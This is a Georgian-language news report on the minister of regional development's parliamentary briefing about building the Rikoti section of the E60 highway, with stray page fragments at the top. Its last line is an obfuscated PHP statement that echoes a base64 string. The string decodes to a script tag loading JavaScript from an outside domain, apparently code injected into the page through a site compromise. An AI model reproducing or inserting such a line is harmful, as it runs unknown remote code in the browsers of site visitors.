celsiusi
ავერსი შნაიდერი

 საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა ირაკლი ქარსელაძემ პარლამენტში დარგობრივი ეკონომიკისა და ეკონომიკური პოლიტიკის კომიტეტის სხდომაზე დეპუტატებს რიკოთის მაგისტრალური გზის მშენებლობის პროექტთან დაკავშირებით ინფორმაცია მიაწოდა და კითხვებს უპასუხა.

თავის გამოსვლაში მინისტრმა ხაზი გაუსვა პროექტის მნიშვნელოვან მიმართულებებს და აღნიშნა, რომ რიკოთის 52 კმ-იანი მონაკვეთი არის აღმოსავლეთ-დასავლეთის საერთაშორისო (E60) მაგისტრალური გზის ყველაზე გამომწვევი და რთული მონაკვეთი რელიეფისა და მასშტაბურობის გათვალისწინებით, რომლის საერთაშორისო სტანდარტებთან შესაბამისობაში მოყვანის, უსაფრთხოების ხარისხისა და განვითარების გეგმაზე სახელმწიფომ მუშაობა რამდენიმე წლის წინ დაიწყო.
 
მისი თქმით, ამ პროცესს წინ უძღვოდა მოსამზადებელი საპროექტო სამუშაოები და პროექტის განხორციელებაში, საპროექტო სამუშაოების ეტაპიდანვე, ჩართული იყვნენ პარტნიორები - საერთაშორისო საფინანსო ინსტიტუტები. შესაბამისად, საერთაშორისო საფინანსო ინსტიტუტების პროცედურების, პოლიტიკისა და წესების დაცვით ჩატარდა პროექტის მნიშვნელოვანი წინა მოსამზადებელი კვლევები, პროექტირება, სამშენებლო ტენდერები და შემდგომ უკვე მათი ჩართულობითა და ზედამხედველობით მიმდინარეობდა და მიმდინარეობს სამშენებლო პროცესები.
 
მინისტრმა აღნიშნა, რომ რიკოთის მაგისტრალის პროექტირების შესასრულებლად კომპანიები გამოვლინდა მსოფლიო ბანკის და აზიის განვითარების ბანკის პროცედურების დაცვით. შერჩევის ეტაპში მონაწილეობა მიიღეს მსოფლიოში აღიარებულმა და ცნობილმა კომპანიებმა და შედეგად, ოთხივე მონაკვეთის პროექტირება განახორციელეს ამერიკულმა, იტალიურმა, თურქულმა და სამხრეთ კორეულმა კომპანიებმა. პროექტირებაში მონაწილეობდნენ ცნობილი ქართული კომპანიები.
 
,,ჯამში, რიკოთის მონაკვეთის მხოლოდ პროექტირებაში ჩართული იყო 140 სპეციალისტი, საიდანაც 56 იყო საერთაშორისო ექსპერტი, ხოლო 84 - ადგილობრივი. ამ დიდ გუნდში იმუშავა ყველა შესაძლო სპეციალობისა და დარგის წარმომადგენელმა: გვირაბების, ხიდების, საავტომობილო გზების ინჟინრებმა, გეოლოგებმა, გეოტექნიკოსებმა, ჰიდროლოგებმა, გარემოს დაცვის სპეციალისტებმა, საგზაო უსაფრთხოების სპეციალისტებმა და სხვა. გარდა იმისა, რომ პროექტირებაში ჩართული იყვნენ გამოცდილი საპროექტო ორგანიზაციები, მათ მიერ მომზადებულ პროექტს აუდიტი ჩაუტარეს საერთაშორისო საფინანსო ინსტიტუტების დამოუკიდებელმა სპეციალისტებმა მათ შორის, ფრანგებმა იტალიელებმა, ავსტრალიელებმა, ავსტრიელებმა და მხოლოდ მათი დასტურის შემდეგ დამტკიცდა რიკოთის პროექტი“-განაცხადა ირაკლი ქარსელაძემ.
240
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");